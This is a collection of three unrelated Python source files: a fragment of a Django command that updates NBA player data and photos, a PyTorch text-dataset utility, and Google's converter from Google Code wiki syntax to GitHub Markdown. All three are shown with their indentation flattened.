name = api_player['DISPLAY_LAST_COMMA_FIRST']
last, first = name.replace(' ', '').split(',', 1)
except ValueError:
# Only one name
first = api_player['DISPLAY_LAST_COMMA_FIRST']
last = ''
player.first_name = first
player.last_name = last
player.PERSON_ID = api_player['PERSON_ID']
player.PLAYERCODE = api_player['PLAYERCODE']
# Add player photo only on creation
if not player.photo:
base_url = ('http://i.cdn.turner.com/nba/nba/.element/'
'img/2.0/sect/statscube/players/large/')
filename = api_player['PLAYERCODE'] + '.png'
photo_url = base_url + filename
# Try three times
session = requests.Session()
adapter = requests.adapters.HTTPAdapter(max_retries=3)
session.mount('http://', adapter)
response = session.get(photo_url)
if response:
image_content = ContentFile(response.content)
player.photo.save(filename, image_content)
player.save()
# Player current season
try:
player_stats = PlayerGeneralSplits(
api_player['PERSON_ID']
).overall()[0]
except IndexError:
self.stdout.write(self.style.ERROR("No stats for " + info_msg))
continue
season, __ = Season.objects.get_or_create(
abbr=player_stats['GROUP_VALUE'],
)
qs = PlayerSeason.objects.filter(
player=player, season=season,
)
if qs.exists():
player_season = qs[0]
else:
player_season = PlayerSeason()
# Team
if api_player['TEAM_ID'] and api_player['TEAM_CODE']:
team = Team.objects.get(TEAM_ID=api_player['TEAM_ID'])
else:
# Player played this season, but was cut/moved to D-League
team = None
player_season.team = team
player_season.player = player
player_season.season = season
player_season.ROSTERSTATUS = api_player['ROSTERSTATUS']
player_season.GAMES_PLAYED_FLAG = api_player['GAMES_PLAYED_FLAG']
player_season.pts = player_stats['PTS']
player_season.reb = player_stats['REB']
player_season.ast = player_stats['AST']
player_season.stl = player_stats['STL']
player_season.blk = player_stats['BLK']
player_season.fg_pct = player_stats['FG_PCT']
player_season.fg3_pct = player_stats['FG3_PCT']
player_season.ft_pct = player_stats['FT_PCT']
player_season.save()
self.stdout.write(self.style.SUCCESS("Successfully updated players"))
|
import torch
from torch.utils.data import Dataset
from torch.nn.utils.rnn import pad_sequence
import json
from tqdm import tqdm
from collections import defaultdict
import random
def load_data(path):
with open(path, 'r') as f:
for line in f:
yield json.loads(line)
def get_data(data, numericalizer, fields):
_data = []
for datum in tqdm(data, desc='Creating dataset...'):
datum_fields = set(datum.keys())
for field in datum_fields:
if field not in fields:
del datum[field]
_data.append(numericalizer(datum))
return _data
def categorical_accuracy(prediction, label):
max_preds = prediction.argmax(dim=1, keepdim=True)
correct = max_preds.squeeze(1).eq(label)
return correct.sum() / torch.FloatTensor([label.shape[0]])
def categorical_tag_accuracy(predictions, tags, tag_pad_idx):
max_preds = predictions.argmax(dim=1, keepdim=True)
non_pad_elements = (tags != tag_pad_idx).nonzero()
correct = max_preds[non_pad_elements].squeeze(1).eq(tags[non_pad_elements])
return correct.sum() / torch.FloatTensor([tags[non_pad_elements].shape[0]])
class TextDataset(Dataset):
def __init__(self, path, tokenizer, fields):
self.tokenizer = tokenizer
self.fields = fields
data_iter = load_data(path)
self.data = get_data(data_iter, tokenizer.numericalize, fields)
def __len__(self):
return len(self.data)
def __getitem__(self, idx):
return self.data[idx]
def collate(self, batch):
batch_data = defaultdict(list)
for item in batch:
for field in item.keys():
if field in self.tokenizer.vocabs:
batch_data[field].append(torch.LongTensor(item[field]))
batch_data[field + '_lengths'].append(len(item[field]))
else:
batch_data[field].append(item[field])
for field, values in batch_data.items():
if field in self.tokenizer.vocabs:
pad_token = self.tokenizer.vocabs[field].pad_token
pad_idx = self.tokenizer.vocabs[field].stoi[pad_token]
batch_data[field] = pad_sequence(values,
padding_value=pad_idx).cuda()
else:
batch_data[field] = torch.LongTensor(values).cuda()
return batch_data
class MaskDataset(Dataset):
def __init__(self, path, tokenizer, fields):
self.tokenizer = tokenizer
self.fields = fields
data_iter = load_data(path)
self.data = get_data(data_iter, tokenizer.numericalize, fields)
def __len__(self):
return len(self.data)
def __getitem__(self, idx):
return self.data[idx]
def collate(self, batch):
batch_data = defaultdict(list)
for item in batch:
for field in item.keys():
if field in self.tokenizer.vocabs:
assert '<mask>' in self.tokenizer.vocabs[field].stoi
mask_idx = self.tokenizer.vocabs[field].stoi['<mask>']
mask_pos = random.randint(0, len(item[field])-1)
masked_token = item[field][mask_pos]
item[field][mask_pos] = mask_idx
batch_data[field].append(torch.LongTensor(item[field]))
batch_data[field + '_lengths'].append(len(item[field]))
batch_data[field + '_mask'].append(masked_token)
else:
batch_data[field].append(item[field])
for field, values in batch_data.items():
if field in self.tokenizer.vocabs:
pad_token = self.tokenizer.vocabs[field].pad_token
pad_idx = self.tokenizer.vocabs[field].stoi[pad_token]
batch_data[field] = pad_sequence(values,
padding_value=pad_idx).cuda()
else:
batch_data[field] = torch.LongTensor(values).cuda()
return batch_data
|
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Handles conversion of Wiki files."""
import urlparse
from . import constants
class Converter(object):
"""Class that handles the actual parsing and generation."""
# A map of HTML tags to a list of the supported args for that tag.
_BASIC_HTML_ARGS = ["title", "dir", "lang"]
_BASIC_HTML_SIZEABLE_ARGS = (_BASIC_HTML_ARGS +
["border", "height", "width", "align"])
_BASIC_HTML_TABLE_ARGS = (_BASIC_HTML_SIZEABLE_ARGS +
["valign", "cellspacing", "cellpadding"])
_ALLOWED_HTML_TAGS = {
"a": _BASIC_HTML_ARGS + ["href"],
"b": _BASIC_HTML_ARGS,
"br": _BASIC_HTML_ARGS,
"blockquote": _BASIC_HTML_ARGS,
"code": _BASIC_HTML_ARGS + ["language"],
"dd": _BASIC_HTML_ARGS,
"div": _BASIC_HTML_ARGS,
"dl": _BASIC_HTML_ARGS,
"dt": _BASIC_HTML_ARGS,
"em": _BASIC_HTML_ARGS,
"font": _BASIC_HTML_ARGS + ["face", "size", "color"],
"h1": _BASIC_HTML_ARGS,
"h2": _BASIC_HTML_ARGS,
"h3": _BASIC_HTML_ARGS,
"h4": _BASIC_HTML_ARGS,
"h5": _BASIC_HTML_ARGS,
"i": _BASIC_HTML_ARGS,
"img": _BASIC_HTML_SIZEABLE_ARGS + ["src", "alt"],
"li": _BASIC_HTML_ARGS,
"ol": _BASIC_HTML_ARGS + ["type", "start"],
"p": _BASIC_HTML_ARGS + ["align"],
"pre": _BASIC_HTML_ARGS,
"q": _BASIC_HTML_ARGS,
"s": _BASIC_HTML_ARGS,
"span": _BASIC_HTML_ARGS,
"strike": _BASIC_HTML_ARGS,
"strong": _BASIC_HTML_ARGS,
"sub": _BASIC_HTML_ARGS,
"sup": _BASIC_HTML_ARGS,
"table": _BASIC_HTML_TABLE_ARGS,
"tbody": _BASIC_HTML_TABLE_ARGS,
"td": _BASIC_HTML_TABLE_ARGS,
"tfoot": _BASIC_HTML_TABLE_ARGS,
"th": _BASIC_HTML_TABLE_ARGS,
"thead": _BASIC_HTML_TABLE_ARGS + ["colspan", "rowspan"],
"tr": _BASIC_HTML_TABLE_ARGS + ["colspan", "rowspan"],
"tt": _BASIC_HTML_ARGS,
"u": _BASIC_HTML_ARGS,
"ul": _BASIC_HTML_ARGS + ["type"],
"var": _BASIC_HTML_ARGS,
}
# These plugins consume raw text.
_RAW_PLUGINS = ["code", "wiki:comment", "pre"]
# Parameters supported by the g:plusone plugin.
_PLUSONE_ARGS = ["count", "size", "href"]
# Parameters supported by the wiki:video plugin.
_VIDEO_ARGS = ["url", "width", "height"]
_VIDEO_DEFAULT_WIDTH = "425"
_VIDEO_DEFAULT_HEIGHT = "344"
def __init__(
self,
pragma_handler,
formatting_handler,
warning_method,
project,
wikipages):
"""Create a converter.
Args:
pragma_handler: Handler for parsed pragmas.
formatting_handler: Handler for parsed formatting rules.
warning_method: A function to call to display a warning message.
project: The name of the Google Code project for the Wiki page.
wikipages: Wiki pages assumed to exist for auto-linking.
"""
self._pragma_handler = pragma_handler
self._formatting_handler = formatting_handler
self._warning_method = warning_method
self._wikipages = wikipages
self._project = project
def Convert(self, input_stream, output_stream):
"""Converts a file in Google Code Wiki format to Github-flavored Markdown.
Args:
input_stream: Input Wiki file.
output_stream: Output Markdown file.
"""
# For simpler processing just load the entire file into memory.
input_lines = input_stream.readlines()
input_line = 1
# First extract pragmas, which must be placed at the top of the file.
input_line = self._ExtractPragmas(input_line, input_lines, output_stream)
# Now ignore any starting vertical whitespace.
input_line = self._MoveToMain(input_line, input_lines, output_stream)
# At the main text, begin processing.
input_line = self._ProcessBody(input_line, input_lines, output_stream)
# Done, but sanity check the amount of input processed.
remaining_lines = len(input_lines) - input_line + 1
if remaining_lines != 0:
self._warning_method(
input_line,
u"Processing completed, but not all lines were processed. "
"Remaining lines: {0}.".format(remaining_lines))
def _ExtractPragmas(self, input_line, input_lines, output_stream):
"""Extracts pragmas from a given input.
Args:
input_line: Current line number being processed.
input_lines: Input Wiki file lines.
output_stream: Output Markdown file.
Returns:
The new value of input_line after processing.
"""
for line in input_lines[input_line - 1:]:
pragma_match = constants.PRAGMA_RE.match(line)
if not pragma_match:
# Found all the pragmas.
break
# Found a pragma, strip it and pass it to the handler.
pragma_type, pragma_value = pragma_match.groups()
self._pragma_handler.HandlePragma(
input_line,
output_stream,
pragma_type.strip(),
pragma_value.strip())
# Moving on to the next line.
input_line += 1
return input_line
def _MoveToMain(self, input_line, input_lines, unused_output_stream):
"""Move the input line position to the main body, after pragmas.
Args:
input_line: Current line number being processed.
input_lines: Input Wiki file lines.
Returns:
The new value of input_line after processing.
"""
for line in input_lines[input_line - 1:]:
if line.strip():
# Skipped all the whitespace.
break
# Moving on to the next line.
input_line += 1
return input_line
def _ProcessBody(self, input_line, input_lines, output_stream):
"""The process core.
It is a simple loop that tries to match formatting rules
then pass it to the correct handler. It processes the matches
in the same order as Google Code's wiki parser.
Args:
input_line: Current line number being processed.
input_lines: Input Wiki file lines.
output_stream: Output Markdown file.
Returns:
The new value of input_line after processing.
"""
# State tracked during processing:
self._code_block_depth = 0 # How many code block openings we've seen.
self._code_block_lines = [] # What lines we've collected for a code block.
self._indents = [] # 2-tuple of indent position and list type.
self._open_tags = [] # List of open tags, like bold or italic.
self._table_columns = [] # Table column sizes, taken from the header row.
self._table_column = 0 # Current column in the table body, or zero if none.
self._plugin_stack = [] # Current stack of plugins and their parameters.
first_line = True
for line in input_lines[input_line - 1:]:
stripped_line = line.strip()
self._ProcessLine(
first_line,
input_line,
line,
stripped_line,
output_stream)
# Moving on to the next line.
input_line += 1
first_line = False
if self._code_block_depth:
# Forgotten code block ending, close it implicitly.
code = "".join(self._code_block_lines)
self._formatting_handler.HandleText(input_line, output_stream, code)
self._formatting_handler.HandleCodeBlockClose(input_line, output_stream)
return input_line
def _ProcessLine(
self,
first_line,
input_line,
line,
stripped_line,
output_stream):
"""Processes a single line, depending on state.
Args:
first_line: True if this is the first line, false otherwise.
input_line: Current line number being processed.
line: The raw line string.
stripped_line: The line string, stripped of surrounding whitepsace.
output_stream: Output Markdown file.
Returns:
The new value of input_line after processing.
"""
# Check for the start of a code block.
if constants.START_CODEBLOCK_RE.match(stripped_line):
if self._code_block_depth == 0:
# Start a new collection of lines.
self._code_block_lines = []
else:
# Just an embedded code block.
self._code_block_lines.append(line)
self._code_block_depth += 1
return
# Check for the end of a code block.
if constants.END_CODEBLOCK_RE.match(stripped_line):
self._code_block_depth -= 1
if self._code_block_depth == 0:
# Closed the highest-level code block, handle it.
self._formatting_handler.HandleEscapedText(
input_line,
output_stream,
"\n")
self._formatting_handler.HandleCodeBlockOpen(
input_line,
output_stream,
None)
code = "".join(self._code_block_lines)
self._formatting_handler.HandleText(input_line, output_stream, code)
self._formatting_handler.HandleCodeBlockClose(input_line, output_stream)
else:
# Just closed an embedded clode block.
self._code_block_lines.append(line)
return
# Check if we're in a code block.
# If we are, just put the raw text into code_block_lines.
if self._code_block_depth != 0:
self._code_block_lines.append(line)
return
# For empty lines, close all formatting.
if not stripped_line:
if not self._ConsumeTextForPlugin():
self._SetCurrentList(input_line, 0, " ", output_stream)
self._CloseTags(input_line, output_stream)
if self._table_columns:
self._formatting_handler.HandleTableClose(input_line, output_stream)
self._table_columns = []
self._table_column = 0
self._formatting_handler.HandleParagraphBreak(input_line, output_stream)
return
# Non-empty line, finish the previous line's newline.
if not first_line:
self._formatting_handler.HandleEscapedText(
input_line,
output_stream,
"\n")
# Now check if we're processing within a list.
indent_pos = constants.INDENT_RE.match(line).end()
if (indent_pos and indent_pos < len(line) and
not self._ConsumeTextForPlugin()):
list_type = constants.LIST_TYPES.get(line[indent_pos], "blockquote")
if self._SetCurrentList(input_line, indent_pos, list_type, output_stream):
# Blockquotes take the entire remainder of the line,
# but everything else skips the list symbol plus the space after.
# (In case there is no space after, the first character is skipped;
# we will warn if this is detected, as it was probably unintended.)
if list_type == "blockquote":
line = line[indent_pos:]
else:
if line[indent_pos + 1] != " ":
self._warning_method(
input_line,
u"Missing space after list symbol: {0}, "
"'{1}' was removed instead."
.format(line[indent_pos], line[indent_pos + 1]))
line = line[indent_pos + 2:]
stripped_line = line.strip()
else:
# Reset to no indent.
self._SetCurrentList(input_line, 0, " ", output_stream)
# Finally, split the line into formatting primitives.
# We do so without whitespace so we can catch line breaks across tags.
if constants.LINE_FORMAT_RE.match(stripped_line):
self._ProcessMatch(
input_line,
constants.LINE_FORMAT_RE,
stripped_line,
output_stream)
else:
self._ProcessMatch(
input_line,
constants.TEXT_FORMAT_RE,
stripped_line,
output_stream)
self._CloseTableRow(input_line, output_stream)
def _SetCurrentList(self, input_line, indent_pos, list_type, output_stream):
"""Set the current list level based on the indentation.
Args:
input_line: Current line number being processed.
indent_pos: How far into the line we are indented.
list_type: What the type of the list should be.
output_stream: Output Markdown file.
Returns:
True if we are in a list item, False otherwise.
"""
# Pop and close the lists until we hit a
# list that is at the current position and type
while self._indents and self._indents[-1][0] >= indent_pos:
indents_top = self._indents[-1]
if indents_top[0] == indent_pos and indents_top[1] == list_type:
break
self._formatting_handler.HandleListClose(input_line, output_stream)
self._indents.pop()
# If we just popped everything off, we're not in a list.
if indent_pos == 0:
return False
if not self._indents or indent_pos >= self._indents[-1][0]:
# Add a new indentation if this is the first item overall,
# or the first item at this indentation position.
if not self._indents or indent_pos > self._indents[-1][0]:
self._indents.append((indent_pos, list_type))
# Add the leading Markdown for the list.
indentation_level = len(self._indents)
if list_type == "numeric":
self._formatting_handler.HandleNumericListOpen(
input_line,
output_stream,
indentation_level)
elif list_type == "bullet":
self._formatting_handler.HandleBulletListOpen(
input_line,
output_stream,
indentation_level)
elif list_type == "blockquote":
self._formatting_handler.HandleBlockQuoteOpen(
input_line,
output_stream,
indentation_level)
else:
self._warning_method(
input_line,
u"Bad list type: '{0}'".format(list_type))
return True
def _OpenTag(self, input_line, tag, output_stream):
"""Open a tag and add it to the open tags list.
Args:
input_line: Current line number being processed.
tag: Tag to open.
output_stream: Output Markdown file.
"""
handler = getattr(
self._formatting_handler, u"Handle{0}Open".format(tag), None)
if handler:
handler(input_line, output_stream)
else:
self._warning_method(input_line, u"Bad open tag: '{0}'".format(tag))
self._open_tags.append(tag)
def _CloseTag(self, input_line, tag, output_stream):
"""Close a tag and remove it from the open tags list.
Args:
input_line: Current line number being processed.
tag: Tag to close.
output_stream: Output Markdown file.
"""
handler = getattr(
self._formatting_handler, u"Handle{0}Close".format(tag), None)
if handler:
handler(input_line, output_stream)
else:
self._warning_method(input_line, u"Bad close tag: '{0}'".format(tag))
self._open_tags.remove(tag)
def _CloseTags(self, input_line, output_stream):
"""Close all tags.
Args:
input_line: Current line number being processed.
output_stream: Output Markdown file.
"""
for tag in self._open_tags:
self._CloseTag(input_line, tag, output_stream)
def _CloseTableRow(self, input_line, output_stream):
"""Close table row, if any.
Args:
input_line: Current line number being processed.
output_stream: Output Markdown file.
"""
if self._table_columns:
if self._table_column != 1:
self._formatting_handler.HandleTableRowEnd(input_line, output_stream)
# Check if we just finished the header row.
if not self._table_column:
self._formatting_handler.HandleTableHeader(
input_line,
output_stream,
self._table_columns)
# In a table body, set the current column to 1.
self._table_column = 1
def _ConsumeTextForPlugin(self):
"""Check if text should be consumed raw for a plugin.
Returns:
True if the current plugin is consuming raw text, false otherwise.
"""
return (self._plugin_stack and
self._plugin_stack[-1]["id"] in self._RAW_PLUGINS)
def _ProcessMatch(self, input_line, match_regex, line, output_stream):
"""Process text, using a regex to match against.
Args:
input_line: Current line number being processed.
match_regex: Regex to match the line against.
line: The line being processed.
output_stream: Output Markdown file.
"""
lastpos = 0
for fullmatch in match_regex.finditer(line):
# Add text before the match as regular text.
if lastpos < fullmatch.start():
starting_line = line[lastpos:fullmatch.start()]
if self._ConsumeTextForPlugin():
self._formatting_handler.HandleText(
input_line,
output_stream,
starting_line)
else:
self._formatting_handler.HandleEscapedText(
input_line,
output_stream,
starting_line)
for rulename, match in fullmatch.groupdict().items():
if match is not None:
if self._ConsumeTextForPlugin() and rulename != "PluginEnd":
self._formatting_handler.HandleText(
input_line,
output_stream,
match)
else:
handler = getattr(self, u"_Handle{0}".format(rulename), None)
handler(input_line, match, output_stream)
lastpos = fullmatch.end()
# Add remainder of the line as regular text.
if lastpos < len(line):
remaining_line = line[lastpos:]
if self._ConsumeTextForPlugin():
self._formatting_handler.HandleText(
input_line,
output_stream,
remaining_line)
else:
self._formatting_handler.HandleEscapedText(
input_line,
output_stream,
remaining_line)
def _HandleHeading(self, input_line, match, output_stream):
"""Handle a heading formatter.
Args:
input_line: Current line number being processed.
match: Matched text.
output_stream: Output Markdown file.
"""
match = match.strip()
# Count the equals on the left side.
leftequalcount = 0
for char in match:
if char != "=":
break
leftequalcount += 1
# Count the equals on the right side.
rightequalcount = 0
for char in reversed(match):
if char != "=":
break
rightequalcount += 1
# Users often forget to have the same number of equals signs on
# both sides. Rather than simply error out, we say the level is
# the number of equals signs on the left side.
header_level = leftequalcount
# If the level is greater than 6, the header is invalid and the contents
# are parsed as if no header markup were provided.
if header_level > 6:
header_level = None
# Everything else is the heading text.
heading_text = match[leftequalcount:-rightequalcount].strip()
if header_level:
self._formatting_handler.HandleHeaderOpen(
input_line,
output_stream,
header_level)
self._ProcessMatch(
input_line,
constants.TEXT_FORMAT_RE,
heading_text,
output_stream)
if header_level:
self._formatting_handler.HandleHeaderClose(
input_line,
output_stream,
header_level)
def _HandleHRule(self, input_line, unused_match, output_stream):
"""Handle a heading formatter.
Args:
input_line: Current line number being processed.
unused_match: Matched text.
output_stream: Output Markdown file.
"""
self._formatting_handler.HandleHRule(input_line, output_stream)
def _HandleBold(self, input_line, unused_match, output_stream):
"""Handle a bold formatter.
Args:
input_line: Current line number being processed.
unused_match: Matched text.
output_stream: Output Markdown file.
"""
self._HandleTag(input_line, "Bold", output_stream)
def _HandleItalic(self, input_line, unused_match, output_stream):
"""Handle a italic formatter.
Args:
input_line: Current line number being processed.
unused_match: Matched text.
output_stream: Output Markdown file.
"""
self._HandleTag(input_line, "Italic", output_stream)
def _HandleStrikethrough(self, input_line, unused_match, output_stream):
"""Handle a strikethrough formatter.
Args:
input_line: Current line number being processed.
unused_match: Matched text.
output_stream: Output Markdown file.
"""
self._HandleTag(input_line, "Strikethrough", output_stream)
def _HandleSuperscript(self, input_line, match, output_stream):
"""Handle superscript.
Args:
input_line: Current line number being processed.
match: Matched text.
output_stream: Output Markdown file.
"""
self._formatting_handler.HandleSuperscript(input_line, output_stream, match)
def _HandleSubscript(self, input_line, match, output_stream):
"""Handle subscript.
Args:
input_line: Current line number being processed.
match: Matched text.
output_stream: Output Markdown file.
"""
self._formatting_handler.HandleSubscript(input_line, output_stream, match)
def _HandleInlineCode(self, input_line, match, output_stream):
"""Handle inline code, method one.
Args:
input_line: Current line number being processed.
match: Matched text.
output_stream: Output Markdown file.
"""
self._formatting_handler.HandleInlineCode(input_line, output_stream, match)
def _HandleInlineCode2(self, input_line, match, output_stream):
"""Handle inline code, method two.
Args:
input_line: Current line number being processed.
match: Matched text.
output_stream: Output Markdown file.
"""
self._formatting_handler.HandleInlineCode(input_line, output_stream, match)
def _HandleTableCell(self, input_line, match, output_stream):
"""Handle a table cell.
Args:
input_line: Current line number being processed.
match: Matched text.
output_stream: Output Markdown file.
"""
# Table cells end previous formatting.
self._CloseTags(input_line, output_stream)
# Count the pipes to calculate the column span.
pipecount = 0
for char in match:
if char != "|":
break
pipecount += 1
span = pipecount / 2
# Now output the cell, tracking the size of the contents.
self._formatting_handler.HandleTableCellBorder(input_line, output_stream)
starting_pos = output_stream.tell()
self._ProcessMatch(
input_line,
constants.TEXT_FORMAT_RE,
match[pipecount:],
output_stream)
ending_pos = output_stream.tell()
# Handle the cell width, either tracking or padding.
cell_width = ending_pos - starting_pos
if not self._table_column:
# In the header row, track the column sizes.
self._table_columns.append(cell_width)
else:
# In the table body, pad the cell (for prettier raw text viewing).
colIdx = self._table_column - 1
if colIdx >= len(self._table_columns):
colIdx = len(self._table_columns) - 1
header_cell_width = self._table_columns[colIdx]
remaining_width = header_cell_width - cell_width
if remaining_width > 0:
padding = " " * remaining_width
self._formatting_handler.HandleEscapedText(
input_line,
output_stream,
padding)
self._table_column += 1
if span > 1:
self._warning_method(
input_line,
"Multi-span cells are not directly supported in GFM. They have been "
"emulated by adding empty cells. This may give the correct rendered "
"result, but the plain-text representation may be noisy. Consider "
"removing the multi-span cells from your table, or using HTML.")
while span > 1:
# Empty cell.
self._formatting_handler.HandleTableCellBorder(
input_line,
output_stream)
self._formatting_handler.HandleEscapedText(
input_line,
output_stream,
" ")
self._table_columns.append(1)
span -= 1
def _HandleTableRowEnd(self, input_line, unused_match, output_stream):
"""Handle a table row ending.
Args:
input_line: Current line number being processed.
unused_match: Matched text.
output_stream: Output Markdown file.
"""
# Table cells end previous formatting.
self._CloseTags(input_line, output_stream)
self._CloseTableRow(input_line, output_stream)
def _HandleUrl(self, input_line, match, output_stream):
"""Handle an auto-linked URL.
Args:
input_line: Current line number being processed.
match: Matched text.
output_stream: Output Markdown file.
"""
self._formatting_handler.HandleLink(input_line, output_stream, match, None)
def _HandleUrlBracket(self, input_line, match, output_stream):
"""Handle a bracketed URL.
Args:
input_line: Current line number being processed.
match: Matched text.
output_stream: Output Markdown file.
"""
# First, strip the brackets off to get to the URL and description.
core = match[1:-1]
# Now strip out the description.
parts = constants.WHITESPACE_RE.split(core, 1)
if len(parts) == 1:
url = parts[0]
description = None
else:
url = parts[0]
description = parts[1]
self._formatting_handler.HandleLink(
input_line,
output_stream,
url,
description)
def _HandleWikiWord(self, input_line, match, output_stream):
"""Handle a wiki word.
Args:
input_line: Current line number being processed.
match: Matched text.
output_stream: Output Markdown file.
"""
if match[0] == "!":
self._formatting_handler.HandleEscapedText(
input_line,
output_stream,
match[1:])
elif match not in self._wikipages:
self._formatting_handler.HandleEscapedText(
input_line,
output_stream,
match)
else:
self._formatting_handler.HandleWiki(
input_line,
output_stream,
match,
None)
def _HandleWikiWordBracket(self, input_line, match, output_stream):
"""Handle a bracketed wiki word.
Args:
input_line: Current line number being processed.
match: Matched text.
output_stream: Output Markdown file.
"""
# First, strip the brackets off to get to the wiki and description.
core = match[1:-1]
# Now strip out the description.
parts = constants.WHITESPACE_RE.split(core, 1)
if len(parts) == 1:
wiki = parts[0]
description = None
else:
wiki = parts[0]
description = parts[1]
self._formatting_handler.HandleWiki(
input_line,
output_stream,
wiki,
description)
def _HandleIssueLink(self, input_line, match, output_stream):
"""Handle an auto-linked issue.
Args:
input_line: Current line number being processed.
match: Matched text.
output_stream: Output Markdown file.
"""
issue = match[len("issue"):].strip()
prefix = match[:-len(issue)]
self._formatting_handler.HandleIssue(
input_line,
output_stream,
prefix,
issue)
def _HandleRevisionLink(self, input_line, match, output_stream):
"""Handle an auto-linked revision.
Args:
input_line: Current line number being processed.
match: Matched text.
output_stream: Output Markdown file.
"""
if match[1].lower() == "e":
revision = match[len("revision"):].strip()
else:
revision = match[len("r"):].strip()
prefix = match[:-len(revision)]
self._formatting_handler.HandleRevision(
input_line,
output_stream,
prefix,
revision)
def _HandlePlugin(self, input_line, match, output_stream):
"""Handle a plugin tag.
Args:
input_line: Current line number being processed.
match: Matched text.
output_stream: Output Markdown file.
"""
# Plugins close formatting tags.
self._CloseTags(input_line, output_stream)
# Get the core of the tag, check if this is also an end tag.
if match.endswith("/>"):
core = match[1:-2]
has_end = True
else:
core = match[1:-1]
has_end = False
# Extract the ID for the plugin.
plugin_id = constants.PLUGIN_ID_RE.match(core).group(0)
core_params = core[len(plugin_id):].strip()
# Extract the parameters for the plugin.
params = {}
for name, value in constants.PLUGIN_PARAM_RE.findall(core_params):
# Remove quotes from the value, if they exist
if value.startswith("'"):
value = value.strip("'")
elif value.startswith("\""):
value = value.strip("\"")
params[name] = value
# Now figure out what to do with the plugin.
if plugin_id in self._ALLOWED_HTML_TAGS:
self._HandlePluginHtml(
input_line,
plugin_id,
params,
has_end,
output_stream)
elif plugin_id == "g:plusone":
self._HandlePluginGPlus(
input_line,
plugin_id,
params,
output_stream)
elif plugin_id == "wiki:comment":
self._HandlePluginWikiComment(
input_line,
plugin_id,
params,
output_stream)
elif plugin_id == "wiki:gadget":
self._HandlePluginWikiGadget(input_line, match, output_stream)
elif plugin_id == "wiki:video":
self._HandlePluginWikiVideo(
input_line,
plugin_id,
params,
output_stream)
elif plugin_id == "wiki:toc":
self._HandlePluginWikiToc(input_line, match, output_stream)
else:
self._warning_method(
input_line,
u"Unknown plugin was given, outputting "
"as plain text:\n\t{0}".format(match))
# Wiki syntax put this class of error on its own line.
self._formatting_handler.HandleEscapedText(
input_line,
output_stream,
u"\n\n{0}\n\n".format(match))
# Add plugin and parameters to the stack.
if not has_end:
plugin_info = {"id": plugin_id, "params": params}
self._plugin_stack.append(plugin_info)
def _HandlePluginHtml(
self,
input_line,
plugin_id,
params,
has_end,
output_stream):
"""Handle a plugin tag for HTML.
Args:
input_line: Current line number being processed.
plugin_id: The plugin ID.
params: The plugin params.
has_end: Plugin has an end tag.
output_stream: Output Markdown file.
"""
# Filter the parameters. These are only filtered for output,
# they still have the effect of being usable variables.
allowed_parameters = self._ALLOWED_HTML_TAGS[plugin_id]
filtered_params = {}
for name, value in params.items():
if name in allowed_parameters:
filtered_params[name] = value
else:
self._warning_method(
input_line,
u"The following parameter was given for the '{0}' tag, "
"but will not be present in the outputted HTML:\n\t'{1}': '{2}'"
.format(plugin_id, name, value))
if plugin_id == "code":
self._formatting_handler.HandleCodeBlockOpen(
input_line,
output_stream,
filtered_params.get("language"))
else:
self._formatting_handler.HandleHtmlOpen(
input_line,
output_stream,
plugin_id,
filtered_params,
has_end)
def _HandlePluginGPlus(
self,
input_line,
plugin_id,
params,
output_stream):
"""Handle a plugin tag for +1 button.
Args:
input_line: Current line number being processed.
plugin_id: The plugin ID.
params: The plugin params.
output_stream: Output Markdown file.
"""
filtered_params = {}
for name, value in params.items():
if name in self._PLUSONE_ARGS:
filtered_params[name] = value
else:
self._warning_method(
input_line,
u"The following parameter was given for the '{0}' tag, "
"but will not be present in the outputted HTML:\n\t'{1}': '{2}'"
.format(plugin_id, name, value))
self._formatting_handler.HandleGPlusOpen(
input_line,
output_stream,
filtered_params)
def _HandlePluginWikiComment(
self,
input_line,
plugin_id,
params,
output_stream):
"""Handle a plugin tag for a wiki comment.
Args:
input_line: Current line number being processed.
plugin_id: The plugin ID.
params: The plugin params.
output_stream: Output Markdown file.
"""
for name, value in params.items():
self._warning_method(
input_line,
u"The following parameter was given for the '{0}' tag, "
"but will not be present in the outputted HTML:\n\t'{1}': '{2}'"
.format(plugin_id, name, value))
self._formatting_handler.HandleCommentOpen(input_line, output_stream)
def _HandlePluginWikiGadget(self, input_line, match, output_stream):
"""Handle a plugin tag for a wiki gadget.
Args:
input_line: Current line number being processed.
match: Matched text.
output_stream: Output Markdown file.
"""
self._warning_method(
input_line,
u"A wiki gadget was used, but this must be manually converted to a "
"GFM-supported method, if possible. Outputting as plain text:\n\t{0}"
.format(match))
self._formatting_handler.HandleEscapedText(
input_line,
output_stream,
match)
def _HandlePluginWikiVideo(
self,
input_line,
plugin_id,
params,
output_stream):
"""Handle a plugin tag for a wiki video.
Args:
input_line: Current line number being processed.
plugin_id: The plugin ID.
params: The plugin params.
output_stream: Output Markdown file.
"""
filtered_params = {}
for name, value in params.items():
if name in self._VIDEO_ARGS:
filtered_params[name] = value
else:
self._warning_method(
input_line,
u"The following parameter was given for the '{0}' tag, "
"but will not be present in the outputted HTML:\n\t'{1}': '{2}'"
.format(plugin_id, name, value))
if "url" in filtered_params:
width = filtered_params.get("width", self._VIDEO_DEFAULT_WIDTH)
height = filtered_params.get("height", self._VIDEO_DEFAULT_HEIGHT)
extracted = urlparse.urlparse(filtered_params["url"])
query = urlparse.parse_qs(extracted.query)
video_id = query.get("v", [""])[0]
if not video_id and extracted.path.startswith("/v/"):
video_id = extracted.path[3:]
if not constants.YOUTUBE_VIDEO_ID_RE.match(video_id):
output = ("wiki:video: cannot find YouTube "
"video id within parameter \"url\".")
self._warning_method(
input_line,
u"Video plugin has invalid video ID, outputting error:\n\t{0}"
.format(output))
# Wiki syntax put this class of error on its own line.
self._formatting_handler.HandleEscapedText(
input_line,
output_stream,
u"\n\n{0}\n\n".format(output))
else:
self._formatting_handler.HandleVideoOpen(
input_line,
output_stream,
video_id,
width,
height)
else:
output = "wiki:video: missing mandatory parameter \"url\"."
self._warning_method(
input_line,
u"Video plugin is missing 'url' parameter, outputting error:\n\t{0}"
.format(output))
# Wiki syntax put this class of error on its own line.
self._formatting_handler.HandleEscapedText(
input_line,
output_stream,
u"\n\n{0}\n\n".format(output))
